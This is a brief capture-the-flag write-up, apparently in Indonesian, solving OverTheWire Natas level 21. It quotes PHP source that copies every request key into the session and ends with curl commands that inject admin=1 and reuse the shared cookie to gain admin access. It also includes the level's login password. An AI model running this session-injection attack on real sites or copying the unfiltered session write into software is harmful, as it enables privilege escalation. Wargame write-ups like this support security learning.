Natas
Level 21 Un
soal
Username: natas21 URL: http://natas21.natas.labs.overthewire.org
solve
login menggunakan credential http://natas21:BPhv63cKE1lkQl04cE5CuFTzXe15NfiH@natas21.natas.labs.overthewire.org setelah login tterdapat juga webiste lain di url http://natas21:BPhv63cKE1lkQl04cE5CuFTzXe15NfiH@natas21-experimenter.natas.labs.overthewire.org
reguler
<?php
function print_credentials() { /* {{{ */
if($_SESSION and array_key_exists("admin", $_SESSION) and $_SESSION["admin"] == 1) {
print "You are an admin. The credentials for the next level are:<br>";
print "<pre>Username: natas22\n";
print "Password: <censored></pre>";
} else {
print "You are logged in as a regular user. Login as an admin to retrieve credentials for natas22.";
}
}
/* }}} */
session_start();
print_credentials();experiment
</p>
<?php
session_start();
// if update was submitted, store it
if(array_key_exists("submit", $_REQUEST)) {
foreach($_REQUEST as $key => $val) {
$_SESSION[$key] = $val;
}
}
if(array_key_exists("debug", $_GET)) {
print "[DEBUG] Session contents:<br>";
print_r($_SESSION);
}
// only allow these keys
$validkeys = array("align" => "center", "fontsize" => "100%", "bgcolor" => "yellow");
$form = "";
$form .= '<form action="index.php" method="POST">';
foreach($validkeys as $key => $defval) {
$val = $defval;
if(array_key_exists($key, $_SESSION)) {
$val = $_SESSION[$key];
} else {
$_SESSION[$key] = $val;
}
$form .= "$key: <input name='$key' value='$val' /><br>";
}
$form .= '<input type="submit" name="submit" value="Update" />';
$form .= '</form>';
$style = "background-color: ".$_SESSION["bgcolor"]."; text-align: ".$_SESSION["align"]."; font-size: ".$_SESSION["fontsize"].";";
$example = "<div style='$style'>Hello world!</div>";
?>exploit
curl -i -s -c /tmp/cookie.txt -d "submit&admin=1" \
http://natas21:BPhv63cKE1lkQl04cE5CuFTzXe15NfiH@natas21-experimenter.natas.labs.overthewire.org/?debug
curl -i -s -b /tmp/cookie.txt \
http://natas21:BPhv63cKE1lkQl04cE5CuFTzXe15NfiH@natas21.natas.labs.overthewire.org